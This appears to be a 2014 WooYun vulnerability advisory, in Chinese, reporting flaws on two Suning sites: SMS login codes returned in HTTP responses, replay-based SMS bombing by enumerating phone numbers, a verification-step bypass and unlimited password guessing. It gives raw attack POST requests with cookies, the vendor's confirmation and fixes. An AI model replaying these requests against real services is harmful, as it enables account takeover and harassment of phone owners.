漏洞概要 关注数(18) 关注此漏洞
缺陷编号: WooYun-2014-82114
漏洞标题: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞
相关厂商: 江苏苏宁易购电子商务有限公司
漏洞作者: 路人甲
提交时间: 2014-11-05 15:38
公开时间: 2014-12-20 15:40
漏洞类型: 设计缺陷/逻辑错误
危害等级: 高
自评Rank: 20
漏洞状态: 厂商已经确认
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: 无
漏洞详情
披露状态:
2014-11-05: 细节已通知厂商并且等待厂商处理中
2014-11-05: 厂商已经确认,细节仅向厂商公开
2014-11-15: 细节向核心白帽子及相关领域专家公开
2014-11-25: 细节向普通白帽子公开
2014-12-05: 细节向实习白帽子公开
2014-12-20: 细节向公众公开
简要描述:
苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞
详细说明:
正常登录易购,打开我的互联界面,选择登录模式为短信验证码,获取验证码。
http://10035.suning.com/mysnnet/login.htm
手机号码不是本人,点了验证码也没有用啊。没关系,我们重放一下发送验证码的post请求
POST /myauth/checkMobile.htm HTTP/1.1
Host: 10035.suning.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://10035.suning.com/mysnnet/login.htm
Content-Length: 21
Cookie: WC_PERSISTENT=eRWA662%2bcQv%2bqzAZapSgr8SlGSc%3d%0a%3b2014%2d10%2d11+10%3a00%3a58%2e8%5f1267087194037%2d457%5f10052; _snma=1%7C141299281670776283%7C1412992816707%7C1413188136111%7C1413188142911%7C64%7C4; idsLoginUserIdLastTime=**********; WC_SERVER=6; totalProdQty=2; SN_CITY=100_100_1000173_9173_10001731_11365_2_0; cityId=9173; districtId=11365; _device_session_id=p_c7d*******32b06abc5e5; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d7%2c10052; cartv20=6*****=******** custno=2201771585; WC_ML=L2; WC_RF=H; Login_UserName=+++++++g.com; _snmp=141318813764991770; _snmc=1; _snsr=direct%7Cdirect%7C%7C%7C; _snmb=141318143718696794%7C1413188142916%7C1413188142913%7C52; webcall_last_id=2201771585; nick=%E5%*******%BF%80%E6%B5%AA...; logonStatus=2; authId=si9462D4D359D152F4129CA6EC42274DE8; SN_CLIENT_ID=c347f1b18d614df1aa3f6c18477b3ef4; WC_USERACTIVITY_30000*******l%0ah3Dj5Lc2vnh33WrJoOE3zKQpMppCLQ%3d%3d; _snmz=141318814966888535%7C%28590%2C182%29
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
newMobile=1709258xxxx
以下为重放post请求的具体截图,可以看见返回值里面的smcCode已经提前显示出来了,正常逻辑是显示在手机短信里面的。
接下来就是遍历用户登录了,各种查询,业务办理
另外再提一下,进入用户的界面后,服务密码修改这块,对原密码的输入错误次数没有任何限制,用被暴力破解的后果,
另外1个漏洞,苏宁易购广告联盟
验证当前用户身份存在绕过验证码策略,对手机进行短信轰炸。
http://union.suning.com/aas/myinfo/network/my-info-manager!updatePromobile.action?step=1
抓取验证身份-获取短信验证码数据包
POST /aas/myinfo/network/my-info-manager!sendCode.action HTTP/1.1
Host: union.suning.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://union.suning.com/aas/myinfo/network/my-info-manager!updatePromobile.action?step=1
Content-Length: 28
Cookie: WC_PERSISTENT=raODDuFWOIUODRfaWwog%2fxQ5QIM%3d%0a%3b2014%2d09%2d25+10%3a51%3a26%2e914%5f1267087194037%2d457%5f10052;
proMobile=186XXXXXX&type=u
通过HTTP协议重放攻击,设置proMobile手机号码字段值的范围,可遍历所有手机号码进行短信轰炸。
绕过验证码
正常页面处理逻辑为1,验证身份(输入验证码)-2、修改手机(输入验证码)-3、修改成功。
再次修改手机时可以直接绕过验证身份(输入验证码)链接
http://union.suning.com/aas/myinfo/network/my-info-manager!updatePromobile.action?step=1
复制输入修改新手机186xxxx94xx(输入验证码)链接,即可直接修改新手机并绑定成功。
http://union.suning.com/aas/myinfo/network/my-info-manager!updatePromobile.action?step=2
http://union.suning.com/aas/myinfo/network/my-info-manager!updatePromobile.action?step=3
漏洞证明:
已经证明
修复方案:
1、不将短信验证码显示在http返回值里面
2、服务密码这块加入输入错误次数的限制,防止暴力破解
3、加密,时间戳,每个包要有包序号,每次同向加1,收到重复序号认为是攻击,可以抵御重放攻击。
4、验证更换手机密码步骤之间的关联和有效性。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-11-05 18:44
厂商回复:
感谢提交,漏洞确认,已经抄送给应用部门进行修复。
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红**联盟欢迎你-0-)
( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红**联盟欢迎你-0-)
评论